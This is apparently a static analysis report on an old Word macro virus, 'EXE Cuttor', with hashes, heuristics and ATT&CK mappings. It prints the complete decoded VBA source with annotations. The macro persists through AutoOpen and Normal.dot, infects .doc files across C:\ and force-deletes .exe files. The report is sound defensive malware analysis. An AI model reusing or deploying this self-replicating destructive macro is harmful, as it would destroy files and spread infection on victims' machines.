Cuttor — Office (OLE) malware analysis

Static analysis result for SHA-256 d8e8ac4ae8f4a58a…

MALICIOUS

Office (OLE)

188.5 KB Created: 2001-04-06 10:02:00 Authoring application: Microsoft Word 9.0 First seen: 2012-10-03
MD5: f1ccaf26d4c50a7c5d2f9e1f2568af4f SHA-1: b7e26ce9d3324ae96c3b298922cdd34af9c8d5e6 SHA-256: d8e8ac4ae8f4a58a99b1296d5c8a98a750e8406725d401879cc34e08ae2afcb2
220 Risk Score

Malware Insights

Cuttor · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1083 File and Directory Discovery

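The sample contains a VBA macro with an AutoOpen routine, an auto-execution mechanism that runs when the document is opened and is commonly abused by macro malware. The macro attempts to create a file named 'SARC.dll' in the system directory and save the current document as 'EXE Cuttor.Doc' in the same location. It also attempts to copy the macro module to the Normal.dot template. The extracted source shown below additionally contains a 'search' routine that attempts to copy the module into *.doc files found under C:\ and a 'Destroye' routine that attempts to delete *.exe files found under C:\, so the sample is both self-replicating and destructive. The ClamAV detection signature 'Doc.Trojan.Cuttor-1' strongly suggests the Cuttor family.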

Heuristics 5

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
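    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation. Note that the metadata above gives a creation date of 2001 and a first-seen date of 2012, and the extracted macro is a self-contained macro virus, so this hit should be verified against the three carved Ole10Native streams before it is reported as exploitation of that CVE.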
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
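    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this report olevba did recover VBA source (macros.bas, listed under extracted artifacts), so read this entry alongside the VBA findings rather than as evidence that no VBA project exists.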

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3631 bytes
SHA-256: 5d9c4b29efe9e3f6b57376d96261a7fb61fb1d08445fbadb21eb6fc023012b72
Detection
ClamAV: Doc.Trojan.Cuttor-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module3"
'Macro suriv "EXE Cuttor"

Sub autoopen()
' Analyst annotation: entry point of the macro. "autoopen" is a Word
' auto-macro name, so Word runs this routine when the document is opened.
' It has two paths, selected by whether C:\windows\system\SARC.dll exists:
'   - file absent  -> install path: drop a copy of the document, copy
'                     Module3 into Normal.dot, then create SARC.dll.
'   - file present -> already-installed path: check the dropped copy and
'                     copy Module3 into the document being opened.
' All paths are hard-coded (including the French-localised "Modèles"
' template folder), which makes them usable as host indicators.

Set fs = CreateObject("Scripting.FileSystemObject")
' SARC.dll is only ever created empty further down, so its presence
' acts as an "already installed" marker rather than as a real DLL.
If fs.FileExists("C:\windows\system\SARC.dll") = False Then

' Errors are suppressed from here on; failed steps are silently skipped.
On Error Resume Next

' Removes any existing project item named Module3 from Normal.dot.
' The With target is not referenced inside the block.
With ActiveDocument.AttachedTemplate
            Application.OrganizerDelete _
                Source:="C:\Windows\Application Data\Microsoft\Modèles\Normal.dot", _
                Name:="Module3", _
                Object:=wdOrganizerObjectProjectItems
End With

On Error Resume Next

' Drops a copy of the current (macro-carrying) document under the
' system directory; the other routines use this copy as their source.
ActiveDocument.SaveAs ("c:\windows\system\EXE Cuttor.Doc")

' Persistence: copies Module3 from the active document into the global
' Normal.dot template.
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:="c:\windows\Application data\microsoft\modèles\normal.dot", _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems

' Creates (overwrite = True) and immediately closes SARC.dll without
' writing to it, leaving a zero-byte marker file.
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\Windows\System\SARC.dll", True)
a.Close

On Error Resume Next

Else

On Error Resume Next

' Marker present: verify that the dropped copy still exists.
Set fsb = CreateObject("Scripting.FileSystemObject")
If fsb.FileExists("C:\Windows\system\EXE Cuttor.doc") = False Then
' Dropped copy is missing: show two message boxes (French text) and
' schedule the "kill" routine of this module to run 15 seconds later.
MsgBox "Vous avez essaiez de schque ?!?!", vbExclamation + vbOKOnly, "Ou est passé EXE Cuttor.doc ???"
MsgBox " >:-> ", vbExclamation + vbOKOnly, " :o) "
Application.OnTime When:=Now + TimeValue("00:00:15"), _
Name:="Project.Module3.kill"
End If

' Runs whether or not the copy was found: copies Module3 from the
' dropped file into the document that was just opened.
Application.OrganizerCopy Source:="C:\Windows\system\EXE Cuttor.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems
End If

End Sub
Sub search()
' Analyst annotation: replication routine, called from the "kill" routine.
' Searches C:\ recursively for *.doc files, attempts to copy Module3 from
' the dropped "EXE Cuttor.doc" into each result, then schedules the
' "Destroye" routine. Detection-relevant behaviour: Word enumerating and
' modifying many .doc files across the whole drive.

' Declared but not used in this routine.
Dim fs As String
' Configure the search: every *.doc under C:\, including subfolders.
With Application.FileSearch
    .NewSearch
    .LookIn = "C:\"
    .SearchSubFolders = True
    .FileName = "*.doc"
    .MatchTextExactly = True
    .FileType = msoFileTypeAllFiles
End With

' Errors are suppressed from here on; failed steps are silently skipped.
On Error Resume Next

With Application.FileSearch
    If .Execute() > 0 Then
        For I = 1 To .FoundFiles.Count
            ' The .Attributes statements act on the loop counter I, not on a
            ' file object. NOTE(review): presumably meant to toggle a file
            ' attribute around the copy - intent not confirmable from here.
            I.Attributes = I.Attributes - 1
            ' Copies Module3 from the dropped file into the found document.
            Application.OrganizerCopy Source:="c:\windows\system\EXE Cuttor.doc", _
            Destination:=.FoundFiles(I), _
            Name:="Module3", _
            Object:=wdOrganizerObjectProjectItems
            I.Attributes = I.Attributes + 0
            I.Attributes = I.Attributes + 1
           Next I
    Else
         End If
End With
' Schedules the destructive "Destroye" routine of this module to run
' 1 hour, 1 minute and 1 second after this point.
Application.OnTime When:=Now + TimeValue("01:01:01"), _
Name:="Project.Module3.Destroye"
End Sub
Sub AutoNew()
' Analyst annotation: "AutoNew" is a Word auto-macro name, which Word runs
' when a new document is created. The routine copies Module3 from the
' dropped "EXE Cuttor.doc" into the active document and then saves it,
' so newly created documents also carry the macro module.

' Errors are suppressed; a missing source file is silently ignored.
On Error Resume Next

Application.OrganizerCopy Source:="C:\Windows\system\EXE Cuttor.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems

On Error Resume Next

' Writes the modified document to disk.
ActiveDocument.Save

End Sub
Sub Destroye()
' Analyst annotation: destructive payload, scheduled by the "search"
' routine through Application.OnTime. Searches C:\ recursively for *.exe
' files and calls DeleteFile on entries of the result list.
' Detection-relevant behaviour: Word deleting executables through
' Scripting.FileSystemObject.
Dim po
    Set po = CreateObject("Scripting.FileSystemObject")
' Configure the search: every *.exe under C:\, including subfolders.
With Application.FileSearch
    .NewSearch
    .LookIn = "C:\"
    .SearchSubFolders = True
    .FileName = "*.exe"
    .MatchTextExactly = True
    .FileType = msoFileTypeAllFiles
End With

' Errors are suppressed from here on; failed deletions are silently skipped.
On Error Resume Next

With Application.FileSearch
    If .Execute() > 0 Then
        ' Loop bounds are fixed at 0..2, so at most three result entries
        ' are targeted per invocation. The second DeleteFile argument
        ' (True) forces deletion of read-only files.
        For e = 0 To 2
        po.deletefile .FoundFiles(e), True
         Next e
    Else
         End If
End With
End Sub
Sub kill()
' Analyst annotation: scheduled by autoopen through Application.OnTime when
' the dropped "EXE Cuttor.doc" is found to be missing. Shows a message box
' (French text), saves the active document back to the dropped-copy path,
' then starts the replication routine "search".
MsgBox "Ma vengence va étre terrible !!!", vbCritical + vbOKOnly

' Re-creates the dropped copy from the currently open document.
ActiveDocument.SaveAs ("c:\windows\system\EXE Cuttor.Doc")

Call search
End Sub

'Macro suriv "EXE Cuttor"


Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1053155439/Ole10Native 38308 bytes
SHA-256: 0867a1853134f5b980288576dc975860f5066970bc44cc186611333171efae5f
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_1053159965/Ole10Native 52644 bytes
SHA-256: 9a7677895d9f1d869a93ae02c5694878cb0daa52f9bcea615a157fae9a4544ef
ole10native_02.bin ole-package OLE Ole10Native stream: ObjectPool/_1053160635/Ole10Native 20196 bytes
SHA-256: 9bec50e4f528f9e357e2949fc011bdd418aed406ef81c21713472f90bfee7a15